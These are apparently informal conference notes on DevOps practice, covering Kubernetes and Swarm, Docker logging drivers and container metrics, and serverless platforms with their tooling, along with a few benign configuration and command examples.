Nice Diagram of "Logging Features" with a lot of tools! Look it up in the slides!!!
Kubernetes
- Pod - One or multiple Containers
- 1 pod with 2 containers (e.g. Kibana + Elasticsearch) --> both on the same host (communication via localhost ports) --> ReplicationController: does the job of keeping the desired number of pods running
- Services: entry point via the network to the pods (similar to exposing a port in Docker) -> goes through the load balancer
- AutoScaling
- CLI Tools for it (easy to setup an ElasticSearch Cluster)
Kubernetes Dashboard / Heapster
- Real time information
- Heapster: real time API --> Provides Performance Metrics for every pod and container
docker stack deploy (distributed containers) --> swarm creates an overlay network (can run on different hosts --> this is not possible in Kubernetes)
Kubernetes != Swarm
- Kubernetes has a lot to learn (steeper learning curve)
- Kubernetes better for larger companies with more teams
Docker Logging
- Docker Logging Drivers
- Drivers are set up by Kubernetes
- From Docker: other Options as a Logging Driver:
- JournalD, etc...
- Default: JSON --> works
- If using syslog as the driver: the logs are not saved locally (there is no buffer -> risky: prefer the file driver and forward the files!)
- docker logs container_id
- docker logs container_name
- Syslog driver:
- docker run --log-driver=syslog ...
- Add context to the docker run command with --log-opt (image name, etc.) (see the example after this list)
- More fun with TCP logging drivers:
- docker logs does not work with the syslog driver
- Splunk Logging Driver
- Alternatives to improve the situation of problematic logging drivers:
- Logs as JSON
- When Elasticsearch or the syslog server is not available: have a (smart) agent that buffers the logs (disk buffer)
- Log Agent - something like logstash
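Example of the syslog driver with context added via --log-opt (the log server address is an assumption; the {{.ImageName}}/{{.Name}} tag template is standard Docker syntax):
    docker run -d \
      --log-driver=syslog \
      --log-opt syslog-address=tcp://logserver:514 \
      --log-opt tag="{{.ImageName}}/{{.Name}}" \
      myapp:1.0.3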
Tagging of logs metrics and events
- Automatic tagging with:
- Docker
- container name
- image name
- labels / environments
- host name + ip (on which node is the container running)
- kubernetes
- pod name, UID, namespace
- Swarm
- swarm service name, id, compose project, container # scale
Container Metrics Collection
- docker stats $(docker ps -q)
- Monitoring agents use these metrics and ship them to the backend
LogRouting: For Teams: Label their containers with an Index
Integrate application monitoring in the stack
- Service Discovery
- etcd
- Consul
- or API's
Docker --run -> App Container (config to expose metrics) <-- App Monitor <--Automatic Run-- Docker Monitor <--discovery-- Docker
Key Container Metrics
- Node storage - good Docker ops clean up their disks by removing unused containers --> an alarm for disk problems is important
- Number of containers per host - verify deployment strategies
- CPU quota per container - when we run more containers on one node (limit them)
- Container memory and OOM counter - tune your app's memory settings to match the container limits (JVM arguments have to match)
- Docker events - network connects, docker pulls (auditing: what happened during the deployment of the container -> which container was deployed in which version at which time?)
- Swarm tasks - (only for Swarm) pending tasks
Limit container resources for your apps (see the sketch below)
- Set CPU quotas with: --cpu-quota=6000
- Limit memory and configure the app in the container to the same limits!
- Disable swap (e.g. --memory-swappiness=0)
- ...
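A sketch combining these flags (all values illustrative):
    docker run -d \
      --cpu-quota=6000 \
      --memory=512m \
      --memory-swappiness=0 \
      myapp:1.0.3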
Automatic Deployment of monitoring Agents
- One command to run a service on each node joining the cluster
Swarm3k - Experiment with Docker Swarm (The community provides nodes to the swarm)
Logs have to be rotated so that the disk doesn't get full
In Java: expose the JMX interface
Summary
- Setup of monitoring and logging is complex in dynamic environments!!!!
- Smart Agents to collect, parse, etc. logs!!!
Current State of DevOps
DevOps Pipeline today
- VCS > CI > CD (Delivery + Deployment) > Production
Book for Unit Testing: "Growing Object-Oriented Software, Guided by Tests"
Pipeline State UFO - A Lamp that indicates the current pipeline state :D
Production
- Regression Tests
Book: "Building Microservices"
Platform-as-a-Service
- Kubernetes, ...
Open-Source
- Logging
- ELK
- Call-Tracing
- AWS X-Ray, Zipkin
- Monitoring
- Infrastructure: Nagios
- For single technologies: java, ...
- Charting and dashboarding
- Grafana
- Kibana
@MartinGoodwell
@jpaulreed
Serverless - Like | in Unix
- (re)volution of the cloud
- Don't operate on the server level --> we operate on the function level
- Abstraction of the runtime
- Costs scale with usage --> never pay for idle
- No Server/container/process management
- auto-scale/auto-provision
- global availability
Abstractions
- Bare Metal
- IaaS
- PaaS
- Functions
Function-as-a-Service
- is event-driven
Backend-as-a-Service
Use cases
- Data Processing
- Back-end services / web apps / IoT
- Infrastructure Automation
Challenges
- Functions are like microservices but smaller
- Monitoring + Logging
- Debugging + Diagnostics
- Local Development
- vendor lock-in
- Latency + Cold start
Providers
- AWS
- Azure
- ...
AWS - Lambda
- Runtimes
- Node.js
- Java
- Python
- C#
- Events
- ...
- Monitoring + Logging
- Logs + Metrics pushed to CloudWatch
- ...
- Debugging + Diagnostics
- X-Ray - Shows us the visual function calls in a graph
- Local Development
- No Tool from AWS
- There is a project on github to do this
- Ecosystem
- Step functions
- Creating workflows - Can be described visually in the UI
- Coordinate functions
Google Cloud Functions
- Runtimes
- Node.js
- Events
- HTTP request
- Cloud Pub/Sub
- ...
- Monitoring + Logging
- Logs and Metrics pushed to Stackdriver Logging
- ...
- Debugging + Diagnostics
- Debugging with Stackdriver Debugger
- Local Development
- Cloud Functions Local Emulator
- Ecosystem
- Cloud Functions for Firebase
Microsoft Azure
- Runtimes
- Node
- C#
- ...
- Events
- Http Requests
- Schedule
- Azure stuff
- Monitoring + Logging
- Logs and metrics are pushed to Application Insight
- ...
- Debugging + Diagnostics
- Debugging via local Visual Studio
- Ecosystem
- Logic Apps
IBM - Open Source project
- Runtimes
- Node.js
- Swift
- ...
- anything via Docker
- Events
- HTTP Requests
- Github events
- ...
Functions on Kubernetes
- Kubeless
- Fission
- Funktion
FaunaDB
- DB
- From the team that scaled Twitter
- global consistency
- Pay for actual usage
Serverless (company)
- Offers a CLI
- A Framework
- Serverless.yml file (see the sketch after this list)
serverless deploy
- Different Providers
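A minimal serverless.yml sketch (service and function names are assumptions):
    service: hello-service
    provider:
      name: aws              # other providers can be configured here
      runtime: nodejs6.10
    functions:
      hello:
        handler: handler.hello   # exported function in handler.js
        events:
          - http:
              path: hello
              method: get
serverless deploy then packages and deploys the function to the configured provider.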
@mthenw
polyglot - multiple languages
Nebula OSPackage - turns a Java app into a Debian package
Newt - Netflix Workflow Toolkit
- CLI in Golang
newt package
- `newt setup`
- .newt.yml:
  app-type: node-beta
  build-step: newt exec npm run-script build
  tool-versions:
    node: 6.9.1
    npm: 3.10.8
alias npm="newt exec npm --"